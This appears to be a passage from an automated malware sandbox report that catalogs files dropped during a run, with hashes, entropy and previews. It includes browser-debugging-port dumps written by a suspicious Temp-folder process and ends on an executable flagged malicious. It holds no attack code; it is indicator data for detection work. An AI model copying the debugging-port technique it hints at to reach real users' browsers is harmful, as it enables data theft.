                                                                                                                                                                                                                                                                                      SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                      MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                      SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                      SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                      SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):575056
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                      MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                      SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                      SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                      SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):460992
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                      MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                      SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                      SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                      SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                      MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                      SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                      SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                      SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:uriCache_
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.022430934740917
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQZC7:YWLSGTt1o9LuLgfGBPAzkVj/T8lQZq
                                                                                                                                                                                                                                                                                      MD5:1F8807A2F08B10BCD54892F2C900134C
                                                                                                                                                                                                                                                                                      SHA1:49B3EEE000CCCF2AFC2AE3674DCD6845FFF9EECE
                                                                                                                                                                                                                                                                                      SHA-256:972AE226C5AE3A5E8FFFDA52FC7C866EB8458BA9C42A8D42572E0585522708D9
                                                                                                                                                                                                                                                                                      SHA-512:F8EE5626675336D49BC33E36FE63B0FE26DBA300CF4E721E08763AF3A388A08A4283BC8AB6BAF9311E87882F36910AE51093535798E92C874AFBD07B09200523
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735387527514934}]}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):86
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                      MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                      SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                      SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                      SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):57647
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103640521999742
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynfPGWv/sxtw7j7VLyMV/YoskFoz:z/0+zI7ynfv/4K7VeZoskG
                                                                                                                                                                                                                                                                                      MD5:6E22A71CA72B8C8CB8BB0B0D8447AC13
                                                                                                                                                                                                                                                                                      SHA1:BBE6B42286958326BCA378C0EB160D62FEA3EE33
                                                                                                                                                                                                                                                                                      SHA-256:C172B822668C30105CA48805482C5395646FD9392FA56BFA7377A0D959A20A5F
                                                                                                                                                                                                                                                                                      SHA-512:20158E69D0A1FD99E3B04798E1D2DA2313517157113478136DC5EFCF18AC9CFDF06CC33C82EAF990FE476076B2E18ACAC2669D87C6D991A4E44A66B720E62BFB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):58742
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.100533726021432
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:xMk1rT8H1aRgPGWv/sxtwjzbDXlaR5FoS7VLyMV/Yost:xMYrT8V8Ev/4KVUzVeZost
                                                                                                                                                                                                                                                                                      MD5:3CC9A79AA126767C6BE363FA79E6B953
                                                                                                                                                                                                                                                                                      SHA1:8781DC4F650715D4A07AEB3D75B9CA965D8AB6EC
                                                                                                                                                                                                                                                                                      SHA-256:C872BDE566E0F343C477FBAF143CD3A193FEEA1E8598DEF2CD16FEED5BA2C722
                                                                                                                                                                                                                                                                                      SHA-512:14EF1866A773B712F5336F0103CD19EC944073CF91E84B8D20DC6DB4AB2C930A8C20E93341E1A157CAEC0175816577C2E84055B35F00AC6DB0D8C829D31B82A9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"207f8458-9b43-4ef3-844e-298c2ec776ca"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735286727"},"domain_actions_config":"
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):56066
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103048214506423
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynPPGWv/sxtwN7VLyMV/YoskFoz:z/0+zI7ynPv/4K9VeZoskG
                                                                                                                                                                                                                                                                                      MD5:FA0A1C7DF7FC7A605074E3D85A9FA92D
                                                                                                                                                                                                                                                                                      SHA1:687A003AACB6E16792FECBCFD6EAF3627BD2282A
                                                                                                                                                                                                                                                                                      SHA-256:6A908D7959F04E53B535AA3FEAF201952BDD83983A8DED335983FB53F91EF65E
                                                                                                                                                                                                                                                                                      SHA-512:08B1F7089DD480A3E7547AF811618B7D4F53BA04100DB4301AB16CB0DFF803F1A4C068ED23BA2BE84CDD0EE641EFB05C39DE55023DD4B70F6DB4DEA00FE390A9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2278
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8519283563580777
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKxrgxddCxl9Il8u2igtWQUNRqYI0xN6KK49ifP/zrCtd1rc:mOoYwiYWQUNpgOifP7rt
                                                                                                                                                                                                                                                                                      MD5:7FF848E6C3C46E8941122C76527FC5B8
                                                                                                                                                                                                                                                                                      SHA1:90E64FBD8AD37CDA7B594044A6170C9DB12105C6
                                                                                                                                                                                                                                                                                      SHA-256:B20DABA61673346873F36BCCAC1D123CCF9803428C2BC62A039D41A8B0FCDD68
                                                                                                                                                                                                                                                                                      SHA-512:1D828E9C0E2C4A2461C439F40AC002814378650D4FBAA3F36A43C284B7B301A5F927AA1165D85F30FADD9AB401F472F30D6BDDFF3B2B860D039CD0C5DAABBAF5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.D.h.I.d.z.5.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.a.i.3.N.M.2.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4622
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.990389517450565
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:YYwn/u9/k5Xcbx5jioEwptFOyc4XpQk6Znj:Y1udk5XAjHDwq5Sj
                                                                                                                                                                                                                                                                                      MD5:97C07FA75E28CBB2307CA9AE6440E4F3
                                                                                                                                                                                                                                                                                      SHA1:EFAB1DE76D47FA2AEF844C9D88EC6E84A822A611
                                                                                                                                                                                                                                                                                      SHA-256:0B69D480C617338A4E0D6922E966CE3798440792A70276B5EE52E22B5EC367B3
                                                                                                                                                                                                                                                                                      SHA-512:D44B35072C518C23AA50E6C4E54CDBF69105FC43FC28972C2181FABC96798853F5628A8B5087F8870BBEE371E16DBA11F1DCABD92A0F64B3E9BA6D22D6CE0C66
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".e.h.c.y.X.T.Z.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.a.i.3.N.M.2.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2684
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8958400090752647
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKx68Wa7xM8Jxl9Il8u23L//FmiVyQslrfCN4Kb8pwvCd/vc:a1Yw3L/d4BfCiJs
                                                                                                                                                                                                                                                                                      MD5:EBCF2718FAE8B902956975A96DD68E26
                                                                                                                                                                                                                                                                                      SHA1:D62E1B4D4C1F5C77BB90AD02AD8CCC7B42D9126C
                                                                                                                                                                                                                                                                                      SHA-256:839A038BFA2BD27BBAED6E58C041ADE25F9024723F13FABAA3DA5A9656DBA759
                                                                                                                                                                                                                                                                                      SHA-512:BDD6C7FDAB306679B03E80694CD0CF1369A7B266E165B963322225141B6173508C1DE06FE3E90787B98625736E768920AF405D5A671A938EA5A470C6BA642A0B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.Q.m.3.j.Q.d.3.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.a.i.3.N.M.2.
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3500
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.397316926131031
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:6NnCeHC5NnCsbC7NnCULD9CXNnCpdgECgNnCiGkCiLNnCTgFDCTINnCcwC0NnC2A:6NGNON9L8NSDNlNHBN1GNW
                                                                                                                                                                                                                                                                                      MD5:DFF84103A0501783AD0436B0CE18FBBF
                                                                                                                                                                                                                                                                                      SHA1:644D9F5B72E9887968061727ABBEFDC43042DBA9
                                                                                                                                                                                                                                                                                      SHA-256:27EEF79547C72C0CC513A846CBFB8F1FBA65772389AD851937ED02889F709E3E
                                                                                                                                                                                                                                                                                      SHA-512:460A6B40CB1C36D1FE0A2AB4BC8445CE5D7CE437FB0092E40DD0E289F85C3E1C592E34A65A722C566593FFD9F0DC8BA3934AB4B49D4EA038E43014D8A95D93DA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/30505A642E21A28EB89AC35979B77123",.. "id": "30505A642E21A28EB89AC35979B77123",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/30505A642E21A28EB89AC35979B77123"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/F0316F1EB9B0B4C700DF3DD41989CB02",.. "id": "F0316F1EB9B0B4C700DF3DD41989CB02",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/F0316F1EB9B0B4C700DF3DD41989CB02"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1787
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.360885277951859
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:SfNaoC5TECmfNaoCulCCCul1fNaoCxCMfNaoCfFg0UrU0U8Cfl:6NnC5TECONnCkCwNnCxC4NnCG0UrU0UT
                                                                                                                                                                                                                                                                                      MD5:EBFFFCD97E11CF9A6F99AC501C097C6D
                                                                                                                                                                                                                                                                                      SHA1:A146A8C47CFDDEEA8AF24B173E383AEA80F02E09
                                                                                                                                                                                                                                                                                      SHA-256:C548C806FB6B4DE11B717ACD5EC54D105A2E779596CAAD1F8C380118A87D7A7C
                                                                                                                                                                                                                                                                                      SHA-512:1824713A41E35B0D8924753153AAC1C8080375F56CB0329164978996B00C03627B66FD4952D2A02DF2BE6ED16DE1C5B3F6072B665A9E35204E93006E3E9EA41C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/EBFA2E5C191DB22C2ED3BB66BBDD9CB2",.. "id": "EBFA2E5C191DB22C2ED3BB66BBDD9CB2",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/EBFA2E5C191DB22C2ED3BB66BBDD9CB2"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/FEB65A3F9AF1051FF8249C9ABFFAF021",.. "id": "FEB65A3F9AF1051FF8249C9ABFFAF021",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/FEB65A3F9AF1051FF8249C9ABFFAF021"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):154477
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                      MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                      SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                      SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                      SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):947288
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
